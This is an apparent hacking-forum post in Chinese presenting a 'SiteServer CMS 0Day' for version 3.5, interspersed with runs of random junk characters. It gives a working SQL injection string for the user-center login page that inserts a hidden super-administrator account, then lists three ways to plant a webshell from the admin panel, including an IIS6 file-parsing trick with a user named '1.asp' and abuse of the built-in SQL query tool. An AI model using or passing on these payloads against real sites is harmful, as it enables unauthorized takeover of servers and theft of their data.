SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

5 a1 e- O) C2 Q( Xstieserver官网:www.siteserver.cn
9 s/ k8 Z( y* ?  V# @1 k6 ]

2 ]  e4 o  Y; M& r2 ]5 c
EXP:

; X% Y5 b( I5 Y- U  E% r直接访问UserCenter/login.aspx
; y* K, q4 W" F0 i* M' b5 L* H% `


用户名处输入：
; ?! Z6 X# _/ S# A
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
4 m# t+ g" z  i
( r% o* \( @! C% v* D- i) |3 e' B
9 @, D" v$ M- B! \9 G; U
1 t" H7 [2 @) }7 T1 ~+ w' Z5 G密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
5 \; a8 W4 N; N/ r: _; o7 k


之后再访问后台SiteServer/login.aspx用插入的用户登陆
$ ~: ?2 s. n1 n: R6 {& F  W# G

1 x$ K; i! M2 x" f- }; M) C* Q
后台拿webshell的三种方法：
( \3 s7 ]1 T) \9 z! W
' h4 p# p% D* ?) a4 \& B. `一、
) _$ y) C/ l* P. B
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

- i( K1 m- s1 g6 i二、
5 `9 R& ]9 r3 p3 n
0 L& \# @, x7 I# i成员权限-》添加用户-》用户名为：1.asp
2 \8 @" l1 Z2 s! G
) |' o7 O2 \2 P) i. @' s  @  Fhttp://127.0.0.1/usercenter/

用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

（ps：后台添加用户时不会验证是否含有非法字符）

三、
1 H3 j) M, i1 y2 m4 Z6 U" f
) e' X. }, {( w2 ?- J# }' y; A系统工具-》实用工具-》机器参数查看
! s. S5 l! l# n, c% n可以看到数据库类型、名称，WEB路径

系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
: J" W0 i8 S' ~/ P+ _4 Q
8 g) F- J9 ]; d+ i1 @8 `; V/ n% m& Y$ H